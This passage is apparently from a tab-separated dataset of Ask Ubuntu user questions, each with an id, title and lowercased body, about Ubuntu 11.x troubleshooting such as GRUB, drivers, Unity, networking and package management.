2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x46150f0,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x4614f68,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x46150e0,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x4614e74,0x00000000 ) , stub ! fixme : alsa : audioclient_getmixformat do n't know what to do with 32 channels , pretending there 's only 2 channels fixme : avrt : avsetmmthreadcharacteristicsw ( l '' audio '' ,0xc9eea18 ) : stub err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 fixme : winhttp : winhttpgetieproxyconfigforcurrentuser returning no proxy used err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 fixme : winhttp : winhttpgetieproxyconfigforcurrentuser returning no proxy used err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481
73120	what could cause network lag ( after latest update )	i got very different timings from script accessing gdata ( google servers ) on windows and ubuntu on same machine and thought to compare ping google.com results : x-axis : packets y-axis : ms ping statistics for windows 7 : packets : sent = 100 , received = 100 , lost = 0 ( 0 % loss ) , approximate round trip times in milli-seconds : minimum = 54ms , maximum = 107ms , average = 57ms -- - google.com ping statistics ubuntu 11.04 -- - 100 packets transmitted , 99 received , +4 duplicates , 1 % packet loss , time 107550ms rtt min/avg/max/mdev = 49.688/451.811/2436.608/532.491 ms , pipe 3 what could couse this lag ? i suspect that it 's latest kernel update which was yesterday ( 2.6.38-12-generic ) , as i think everything was fine before last update , but i 'm not sure also , please feel free to ask for data , as i 'm relatively new linux user , and linux network is foreign to me edit 1 : here is output from iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : '' home '' mode : managed frequency:2.412 ghz access point : 00:1f:9f:71:82 : af bit rate=48 mb/s tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=39/100 signal level=39/100 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:383 invalid misc:93 missed beacon:0
73121	if i install lubuntu desktop will i still be able to use gnome shell and unity ?	if i install lubuntu-desktop ( or xubuntu-desktop , for that matter ) from the software centre , in ubuntu 11.10 , will i still be able to use gnome-shell and unity , or will those be deleted ? will it be added on to the little cog at the login screen ?
73122	first installation and failed to install grub-pc , how to solve this ?	how to solve grub setup while first installation ? ( wrong , i choose before to make a new installation , but it was failed and now saying do it manually ! ! strange behaviour ) ( after installation , boot i get now this blinking cursor ) what partition do i do ? i selected sdb
73124	blank screen after installing nvidia-current drivers	i have msi gx701 with nvidia 9600m gt ! i was using ubuntu 10.4 and windows 7 until i decided to install only ubuntu 11.10 . installation worked like a charm for me ! everything was ok until i installed additional drivers for nvidia ( i choose recommended ) ! then the screen turns blank , computer is not responding to any command , but the processor still works . now when i reboot manually , after i log in it passes around 40 seconds until screen turns blank again . i saw that people usually fix problems with this by `` rolling back '' drivers , but i need to know if this problem is fixed so i can use ubuntu in 3d ! i 'm not a total beginner , but i would like help `` spelled out '' if you can ! thank you a lot !
73128	how do i export my openpgp key ?	i have tried the method prescribed in the launchpad but it seems like i ca n't establish a connection with the key server . using a web browser to upload the key does n't work either . is the keyserver down or is there any other method to upload my key ?
73131	ubuntu as the only office / commercial os ?	i was wondering if any people had any experience of using ubuntu ( and other office - like software & possibly some wine installs ) as their only os . to clarify , i am asking if anyone has experience with ms free office environments and would like their input on : training time ( not all office workers are tech savvy ) migration issues support issues compatibility with other ms using offices . other ? i know in theory that ubuntu has all the tools needed , but i havent heard of any experience of people actually doing it . thanks , nws
73136	nautilus renames home folder home , how to stop this ?	the nautilus in ubuntu 11.10 displays home as the name of the user 's home folder , the folder is n't really called home , it 's probably called /home/username . i want to see the real name in nautilus , how can i do this ? i 've tried ubuntu-tweak , dconf , gconf , and gnome-settings ( advanced settings ) , but no luck .
73138	grub does n't give the option to boot into ubuntu	i managed to download ubuntu 11.10 , burn an iso file on a cd and install it on a dell precision 380 along with windows xp . the problem is that ubuntu option does not appear when the computer is started . it seems my bootloader is not working properly . any solutions ?
73147	added a radeon rv100 to use for dual monitors , card not recognized	i am running a intell i3 550 cpu with on board vga . i added a radeon ( rv100 ) vga card to have duel monitors . ubuntu is not seeing the 2nd video card . i know it works with win 7 but i do n't want to run win 7 . how to i get this to work ?
73148	is there an e-mail client which does not need to download mail ?	i would like to know if there is a mail client that just `` reads '' and sends emails without having to download them on the hard drive , due to limited disk space . the advantage over using a web mail interface is that the mail functions centralised for all accounts . thanks for your contribution .
73155	how can i tell what went wrong on resume from hibernation ?	i am having trouble with making my vaio vpcsa2v9r resume after hibernate . i have a swap , i have updated my grub configuration , initramfs and whatnot , it still wo n't boot . but at least it tries now - i see a sceen with ubuntu ( r ) , five white dots and it says 'resuming from ... ' . my question is not why it happens , it is - how can it tell what went wrong ? could not find anything relevant in dmesg ( mor maybe i do n't know to look properly ) , and /var/log/hibernate does n't even exist . where are the logs i should be looking in ? update : thanks florian ! i hesitated to read these pages before , as i am no kernel developer . but my problem turned out to be a case of encrypted swap bug , which is described there . i do not have and encrypted swap anymore , but somehow resume thought i did . i removed cryptsetup from my system and it helped . not a proper solution , but it works . there is probably a proper solution somewhere on this pages .
73159	wifi ca n't connect before wired . how to diagnose what could be going wrong ( which logs , etc ) ?	i think this is a problem related to another i 've had , but here 's the first situation : when i boot up and connect to wireless , i am told i connect to my wireless network . however , i am unable to actually connect to the internet . ( pages time out and say not connected . ) in the second situation - when i boot up and connect via eth , my connection is fine - i can then simultaneously connect to wireless . - after removing the ethernet connection , i have wireless that works fine and keeps my connection . not sure what the root mechanism that 's causing this problem is , but i suspect it 's related to xorg and libglib2 problems i experienced and am resolving elsewhere . however , to confirm my hunches , what log file should i be looking at to even identify why this is happening ? i 'm gunning with this question for a list of places that i should look to diagnose this crazy problem , given that there is a behavior that works differently depending on order of connection . ( one other note , i know this has worked in the recent past , so it 's not an issue of the wireless card itself . ) update mobile broadband has the same problem . does not work unless i first connect to wired connection and simultaneously connect to broadband before removing wired connection . help , please ! update 2 forget diagnosis , can someone fix this please ? i 've been in windows for a week because i ca n't use wifi !
73160	how do i find the amount of free space on my hard drive ?	is there a way to quickly check the amount of free / used disk space in ubuntu ? i would assume you could right click on 'file system ' in the file browser and choose 'properties ' or something but there is no such option .
73163	how do i delete old backup files ?	i have instructed dejadup to keep one-week of backup files . now it is passed more than a month and my backup storage is fed up with old backups . is there a way to instruct dejadup to delete old backups without reaching the storage limit ? can i detele them manually ?
73168	unable to install boot loader	i am able to run ubuntu from a usb thumb drive , but every time i try to install ubuntu , all is well until i get the error grub-install/dev/sda failed . it gives me the option to continue without a boot loader ; cancel the installation or install grub somewhere else . my machine is a dell xps , with two 500g hd in a raid 0 array . the bios is an a04 , ( i think ) i 've been through the bios looking for problems that might stop the boot loader installation . i would very much like to use ubuntu , but this inability to install the boot loader is very frustrating . i would very much appreciate any suggestions .
73171	microphone is n't working in skype or sound recorder . has an extreme lag	i 'm new to ubuntu and am using 11.04 . i 've been trying to skype with a friend for a week now and my microphone is n't working . i did n't have this problem using windows , so it 's not the internal microphone . i also tried plugging in an external microphone , and that did n't work either . i 've played around in sound settings and finally got the external microphone to work in both skype and sound recorder , but it has a drastic lag in both . my voice ends up sounding really slowed down and deep to the other person . anyone else having this problem or know how to fix it ?
73174	how to re-instate the user menu with indicator-session / broken lightdm login	i recently attempted to remove the user indicator applet by disabling the `` user-show-menu '' option in /apps/indicator-session with the dconf-editor ( as mentioned here ) . this worked great for a little , but i had trouble the next time i rebooted . i was greeted with the lightdm login screen as usual , but when i entered my password , i was brought to a non-interactive console and could not do anything . this happened when trying to load any desktop environment ( gnome , gnome classic , unity , unity 2d , etc. ) . the problem appears to be that the display manager is not starting properly . unfortunately , i do not know where to look for any sort of error message . as a workaround , i was able to go into a virtual terminal with ctrl-alt-f1 . if i ran the command sudo start gdm , i was brought to the the gdm login screen and everything was fine after the fact until i restarted . i found a temporary fix by reconfiguring gdm as my default window manager using sudo dpkg-reconfigure lightdm , which has allowed me to login to my computer as usual . i like the appearance of the lightdm greeter way better , and would prefer to have that system working like it was before . i would really appreciate it if someone knew the solution to this , or could point me in the right direction of where to look for an error message . another note : even though i have `` user-show-menu '' now enabled in dconf-editor , there is no user menu in my indicator bar . i 'm running ubuntu 11.10 64 bit on a thinkpad edge e420s . thanks !
73178	x window system error on ubuntu - badwindow > ( invalid window parameter ) when using intellij	i am having trouble running a java program on ubuntu 10.04 desktop with jdk1.6.0_24 . the application works fine on windows platform and starts up fine in linux , it just crashes with the following error when i close an input dialog . this only happens when running the application from intellij and not when it is run from the terminal as a built jar . the program 'time clock ' received an x window system error . this probably reflects a bug in the program . the error was 'badwindow ( invalid window parameter ) ' . ( details : serial 693 error_code 3 request_code 20 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) i 've been looking for fixes , but have n't found anything useful yet . thanks in advance for any help .
73180	how to see packages installed on a given date using aptitude	does anyone know if there 's an easy way to find a list of packages installed , sorted by date , when using aptitude ( or apt-get ) ? i was installing a bunch of packages to try something new , and it did n't work out . i 'd like to remove all of these packages , to get back some disk space . i 've tried just looking at the list of .deb files downloaded , but that seems like a rather backwards way of doing it ( although it did work ) .
73186	what is a recommended high resolution webcam ?	i would like a new webcam for ubuntu that can handle a high resolution 1024 x 768 minimum that i can use within applications such as cheese and stopmotion for recording videos and taking still images . with the images preferably at a higher resolution .
73187	start an application based on extension not protocol ( using xdg-open )	when i do xdg-open demo.odt libre office opens - as it should . when i do xdg-open http : //askubuntu.com my browser opens - as it should . but now i 'd like to have a command where i do mime-based-xdg-open http : //www.someserver/demo.odt and libre office would open with the url on the command line . is there a way to figure out what xdg-open would use for a specific extension or mime-type ? then i could construct a script that does the rest .
73188	how do i move the dialog in the login screen ?	i have a quite wide monitor and it 's quite annoying to see the login dialog in the login screen on the far left side of my screen . i literally have to turn my head around to look at it ! is there a way to center the login dialog ?
73190	how to always show the side bar in unity ?	the sidebar in unity by default hides and getting it back means keeping your mouse on the side of the screen for 1~2 seconds for it to appear again . to me , that 's a huge delay . i understand why they do n't make it appear instantly because you accidentally keep bringing the sidebar up which is also annoying . but , since i 'm on a wide screen monitor , is there an option to tell unity to keep the sidebar always visible ? ( and obviously shrink the maximized windows so that they do n't go under the side bar )
73191	sound problem on high level of memory usage	i 'm under ubuntu 11.04 and i have 3gb memory everthing 's working good , but when the usage of memory is overcoming more then ~80 % then the sound is crached . it sounds like a speaker is broken , you can hear only squeaky sound . to fix this problem i have to reboot the system . is there the posibility to resolve this problem ? thanks .
73192	reverting problems caused by checkinstall with gcc build	i recently downloaded the gcc 4.6.2 source in order to play around a bit with c++11 . having been told about checkinstall and its usefulness in installing programs from source , i created a debian package from the install using sudo checkinstall -d make install . wanting to see how well the newly created package worked , i removed it using synaptic package manager . as it turns out , the package checkinstall created from make install tried to remove every single file the installation process touched , including shared gcc libraries like /lib64/libgcc_s.so . despite not being able to run a bunch of programs due to this missing dependency , i was able to restore my system back to normal by reinstalling the package from command line using dpkg . at this point i want to remove the package from the package manager since it 's so dangerous , but not remove the installed files . i was looking around in /var/lib/dpkg and found that the package manager seems to be based on text files which list packages and such - can i just remove all mention of the package from the files in /var/lib/dpkg , or is there a safer way to go about this ?
73193	how to have multiple instances of the same program in unity ?	you see , if you have an application in the sidebar not running , you click on it and it runs . good . now if you have it running , you click on it and it shows you the already open one . i discovered that with for example firefox , you can right click and tell it to open a new window . i tested it with a random application though , and it does n't have such an option . above all , the home button is also like that ! so the question is , how can i run multiple instances of a program ( or in this case , open multiple instances of my home folder ) ?
73199	vlc displays colors wrong	when i try to play a `` heute journal '' podcast file with vlc , i get colors that look like someone swapped u and v in yuv color system : is there any way to fix this ? i use vlc 1.1.12 on oneiric
73201	what 's causing a lag in session startup ? ( with bootchart )	in my session startup something there is a lag in which nothing ( seems to ) happens . i 've created a bootchart image but i need some help interpreting it . you can clearly see the gap between around 50s and 65s . as far as i can tell it has something to do with pulseaudio , specifically pulseaudio gconf-helper . can any of you guys ( or gals ) help me out ? thanks in advance .
73202	google talk video not working	ok yesterday i tried google talk video for the first time . i am using ubuntu 11.10 , google talk worked for me on my browser could see and hear both ways . however , when i tired google talk video on empathy it did not . i would accept the call the new chat window would pop up but then disappear just as quick , the caller on the other end would see a message saying i ended the call . i had no chance to , and i accepted not declined . also , when i tried to initiate the call it would not allow me to . as i understood things google talk was supported by empathy 'out of the box ' , any reason why empathy and google talk are not playing nice ? thank you for your time and answers ps . text chat works fine on empathy . and other user is using google talk via web browser
73203	how do i stop gedit from opening anything ?	i use gvim all the time and open all sorts of plain text files , source codes and virtually anything that is readable with gvim . ubuntu however decides that i should use gedit ! i got searching and i found this that correctly makes ubuntu open my plain text files with gvim , but no luck with source files . i set both sudo update-alternatives -- config editor sudo update-alternatives -- config gnome-text-editor to gvim , but still it uses gedit for source files . not to mention most of what you find on the internet say `` right click- > open with- > always use this application '' to set the default app for each of your file types . i 'm fine with that , but in the new ubuntu ( 11.10 ) that option is simply not there anymore . but it could get rather cumbersome . i went for uninstalling gedit , but it told me if i do , future updates will not include new items in the ubuntu desktop system set . my question is , how can i tell ubuntu to change the default application of all those things that open with gedit to gvim ? if no such thing is possible ( which would be the stupidest thing ever ) , would i really miss much if i uninstall gedit and forget about those mentioned new items ?
73206	red5 - linux installation init.d script	i have followed this pretty little tutorial to install red5 on ubuntu 11.04 i can now run it from /usr/share/red5/red5.sh but i 'd like to have a init.d script like /etc/init.d/red5 start|stop|restart| ... i found one here but when used , it 's saying . : 11 : ca n't open /etc/rc.d/init.d/functions what can i do to make it work ? edit replacing . /etc/rc.d/init.d/functions by . /lib/lsb/init-functions will give me $ sudo /etc/init.d/red5 stop /etc/init.d/red5 : 50 : status } ” : not found stop : missing task name try 'stop -- help ' for more information . restart : missing task name try 'restart -- help ' for more information .
73211	using two ethernet connections ( internet enabled ) simultaneously	i have searched and read over the internet and also on askubuntu . i am using ubuntu 11.04 and my question or the thing that i want to achieve is efficient use of both the connections and thus increasing my browsing and downloading speed . i want my system to decide which packet should be routed over which interface . i want to know if this is possible . for example , is it possible to route alternate packets over the two interfaces ? please let me know any internet resource or if i would have to insert any code into the network drivers etc . ?
73216	how can i build gnome shell from jhbuild ?	i 'm running ubuntu 11.10 , and wanted to build gnome with jhbuild to get the latest and greatest . unfortunately the setup scripts wants me to install xulrunner-dev and libreadline5-dev which are both missing from the package repositories . i was wondering if i can just ignore them , or is there some way i can get them ?
73219	remove packages to tranform ubuntu desktop to server ?	i have a vps that has ubuntu 11.10 on it . unfortunately , only the 11.10 desktop ( not server ) image was available as an image to install your vps with . how can i remove the packages included in the desktop install , and , if needed , install the packages that only the server install has ? i 've tried sudo apt-get remove ubuntu-desktop and then sudo apt-get autoremove . unfortunately , that did n't work : it only removed 'libjudy-debian ' ( or something like that ) which was installed from having 'miredo ' installed at one point .
73221	connect to kvm remotely	if i install kvm on an ubuntu server and create some windows virtual machines , i will need a gui to go through the windows install process . will i need to install a gui on the server , or is there a way i can connect to kvm remotely from , say , my windows workstation ? i know vmware and hyper-v allow you to connect to a virtual machine remotely , so certainly kvm does as well ... . right ?
73222	are there drawbacks to not wanting to upgrade your ubuntu anymore ?	i 'm happy with ubuntu 11.04 ( classic no effects ) , and do n't want to upgrade anymore to the more unity and compiz-centric 11.10 and beyond . can it hurt me to stay at 11.04 for a year or two or more ?
73224	how can i remove `` show desktop '' icon from alt-tab ?	is it possible to remove `` show desktop '' icon when i alt+tab applications ? thanks !
73225	what happened to `` backgrounds and emblems '' in nautilus ?	what happened to `` backgrounds and emblems '' in nautilus . i installed ubuntu 11.10 with nautilus 3.2.1 and there is no longer a way to set backgrounds or add emblems .
73229	faulty unity windows resizing keyboard bindings , how do i re-enable them ?	prior to upgrading ubuntu from meerkat ( 10.10 ) , it was possible to put windows on the left or right of the screen using ctl-alt-4 , ctl-alt-6 . subsequent presses of the same would resize the window from the respective edge outwards . needless to say that the feature is mandatory for mouseless window management ( try pressing ctl-alt-5 several times to see how useful it can be ) . i 've checked compiz settings where window management/grid contains the relevant configurations . however , i can not see anything related to cyclic resizing ( window placement width ) . how can i re-enable this functionality ?
73231	`` graphic driver : unknown '' when using an ati radeon xpress 200m	i have just upgraded to ubuntu 11.10 and although the system seems to work properly , in system settings > system info , i 'm getting `` graphics driver : unknown '' i found some answers about fglrx and ati drivers but what should i choose ? should i do something to fix this ?
73233	quality with the screenshot tool is n't good	whenever i take screenshots using the default screenshot tool on my ubuntu 11.10 ( unity ) , the image does not look as good as the screen itself ( the quality is deteriorated ) . so i would like to take high quality screenshots . is there any tool for this ? [ the resolution of the image is the same as that of my screen , but surprisingly , it does not look as good as the original one . ]
73234	is there a way to create a windows virtual machine on ubuntu server ?	when i look for documentation about how to create a windows vm on an ubuntu host , the only articles i can find are articles about ubuntu desktop , not ubuntu server . is there a way to create a windows vm on ubuntu server ? can anyone point me to any articles ? bonus points if i do n't need to compile anything or do anything super complex .
73239	ca n't install vlc and other software : packages not coming from authenticated sources	after installing ubuntu 11.10 last week i could n't install any mp3 or videoplayers such as vlc or any others . they show me something about a failure to install packages , and when i click on details i see this : the action would require the installation of packages from not authenticated sources : libdvdread4 libvlc5 libvlccore4 vlc vlc-data vlc-nox vlc-plugin-notify vlc-plugin-pulse
73258	convert mts to mpeg	i have a sony handycam which records hd videos in avchd resulting in .mts file names . the video doesnt play properly in movie player & vlc player with frames getting stuck in the middle randomly . how do i convert them to mpeg ( mpeg-2 , mp4 ? ) format assuming there is no loss in quality during conversion .
73262	how do i teach bash in ubuntu some curse words ?	when bash encounters an unknown command ( word ? ) it does this : the program 'hello ' can be found in the following packages : * hello * hello-debhelper try : sudo apt-get install < selected package > what i would like to know is how this is done so i can edit it or add something before it to cross check the unknown word from a home grown dictionary which would have phrase : reply pairs that can then be sent to output . i am guilty of not looking enough for it around .. but the few bash guides i tried digging up did n't have anything on this . maybe i am looking at the wrong places .. any pointers ? and yes i am doing this so every time i type wtf when a program fails , i want something nice thrown back at me ...
73272	how do i disable the global application menu in adobe reader 9 ?	how to disable global menu in adobe reader ? the menu link not shown in global menu .
73287	how do i install a root certificate ?	can anyone point me to a good tutorial on installing a root certificate on ubuntu 10 or 11 ? i 've been provided with a .crt file . i gather that need to create a directory at /usr/share/ca-certificates/newdomain.org and place the .crt in that directory . beyond that i 'm not sure how to proceed .
73289	how do i get the nautilus navigation buttons and side panel back ?	since the upgrade , the navigation buttons and the side panel in nautilus file browser windows ahve gone missing . i 'm not sure what got messed up , but none of the toggles for nautilus in gconf seem to restore this . how do i get nautilus to reset to the ubuntu 11.10 defaults ?
73292	ca n't use gnome shell on virtualbox	i am running version 11.10 on a virtualbox vm with ~1000mb dedicated memory , on mid-range hardware and using windows vista as a host . it came with unity pre-installed . i ran : apt-get install gnome-shell when it was complete , i logged out from unity , clicked on the gear icon to select my ui and noticed that there was no trace of gnome shell : i tried selecting gnome thinking that it could be the right one but i was presented with this desktop , which i do n't believe to be the gnome shell desktop : am i doing anything wrong ?
73295	setting amarok as default music app does n't work right	i 'm unable to find a setting to change the default music app in ubuntu 's dash home . when i uninstalled banshee the default music app changed to mplayer.the problem is that when i press my media key ( on the keyboard ) to start a media player it starts mplayer rather than amarok . when i uninstall all media apps except amarok it changes to default and all keyboard media buttons work perfectly with it , but as soon as i install another media app the new one displaces amarok . ubuntu 11.10
73298	missing icons in 11.10 upgrade	after upgrading to 11.10 from 11.04 ( i think ) , some of the icons such as the folder icons in nautalus are replaced with the generic file icon ... this makes it hard to navigate . is there any easy way to fix this ?
73311	parsing a text to only see specific data	i have the following text lines : .add 7971 [ player : sunfire ( account : 11309 ) x : 5839.623047 y : 600.437439 z : 650.839722 map : 571 selected player : llubia ( guid : 19369 ) ] .add 43956 [ player : sunfire ( account : 11309 ) x : 5277.887695 y : 2862.181641 z : 446.735931 map : 571 selected none : ( guid : 0 ) ] .add 43956 [ player : sunfire ( account : 11309 ) x : 5281.407715 y : 2864.844482 z : 446.735931 map : 571 selected player : staticbaby ( guid : 19826 ) ] .add 43956 [ player : sunfire ( account : 11309 ) x : 5231.464844 y : 1437.029175 z : 648.498535 map : 571 selected player : sunfire ( guid : 15295 ) ] .add 44077 [ player : sunfire ( account : 11309 ) x : 5231.464844 y : 1437.029175 z : 648.498535 map : 571 selected player : sunfire ( guid : 15295 ) ] .add 49285 [ player : sunfire ( account : 11309 ) x : 16225.323242 y : 16252.759766 z : 12.790466 map : 1 selected none : ( guid : 0 ) ] .add 44115 175 [ player : elmasguapo ( account : 11309 ) x : 1659.845093 y : -4198.589844 z : 56.382870 map : 1 selected none : ( guid : 0 ) ] .add 34078 [ player : sunfire ( account : 11309 ) x : 16227.969727 y : 16280.081055 z : 13.175169 map : 1 selected none : ( guid : 0 ) ] .add |cffffffff|hitem:41427:0:0:0:0:0:0:0:80|h [ fuego de artificio de dalaran ] |h|r 50 [ player : sunfire ( account : 11309 ) x : 16221.392578 y : 16260.944336 z : 13.255954 map : 1 selected none : ( guid : 0 ) ] .add |cffffffff|hitem:45932:0:0:0:0:0:0:0:80|h [ gelatina negra ] |h|r [ player : sunfire ( account : 11309 ) x : 5874.347168 y : 679.056763 z : 167.483719 map : 571 selected player : assasins ( guid : 19438 ) ] .add |cffffffff|hitem:45932:0:0:0:0:0:0:0:80|h [ gelatina negra ] |h|r [ player : sunfire ( account : 11309 ) x : 5873.767090 y : 679.386841 z : 167.435257 map : 571 selected player : assasins ( guid : 19438 ) ] .add |cffffffff|hitem:45932:0:0:0:0:0:0:0:80|h [ gelatina negra ] |h|r [ player : sunfire ( account : 11309 ) x : 16226.880859 y : 16247.247070 z : 12.286857 map : 1 selected player : irmtarget ( guid : 18521 ) ] .add |cffffffff|hitem:45932:0:0:0:0:0:0:0:80|h [ gelatina negra ] |h|r [ player : sunfire ( account : 11309 ) x : 16229.297852 y : 16251.202148 z : 13.081388 map : 1 selected player : irmtarget ( guid : 18521 ) ] .add 41600 2 [ player : sunfire ( account : 11309 ) x : 16223.138672 y : 16250.496094 z : 12.431313 map : 1 selected player : eifreen ( guid : 20341 ) ] .add 41600 1 [ player : sunfire ( account : 11309 ) x : 16223.138672 y : 16250.496094 z : 12.431313 map : 1 selected player : eifreen ( guid : 20341 ) ] .add 40516 [ player : sunfire ( account : 11309 ) x : 16223.138672 y : 16250.496094 z : 12.431313 map : 1 selected player : eifreen ( guid : 20341 ) ] .add 44661 [ player : sunfire ( account : 11309 ) x : 16223.138672 y : 16250.496094 z : 12.431313 map : 1 selected player : eifreen ( guid : 20341 ) ] .add 40518 [ player : sunfire ( account : 11309 ) x : 16223.138672 y : 16250.496094 z : 12.431313 map : 1 selected player : eifreen ( guid : 20341 ) ] .add 44005 [ player : sunfire ( account : 11309 ) x : 16223.138672 y : 16250.496094 z : 12.431313 map : 1 selected player : eifreen ( guid : 20341 ) ] .add 45867 [ player : sunfire ( account : 11309 ) x : 16223.138672 y : 16250.496094 z : 12.431313 map : 1 selected player : eifreen ( guid : 20341 ) ] .add 45316 [ player : sunfire ( account : 11309 ) x : 16223.138672 y : 16250.496094 z : 12.431313 map : 1 selected player : eifreen ( guid : 20341 ) ] and i want to parse it so it outputs something like this : line 1 for example - 7971 llubia line 3 for example - 43956 staticbaby line 9 for example - 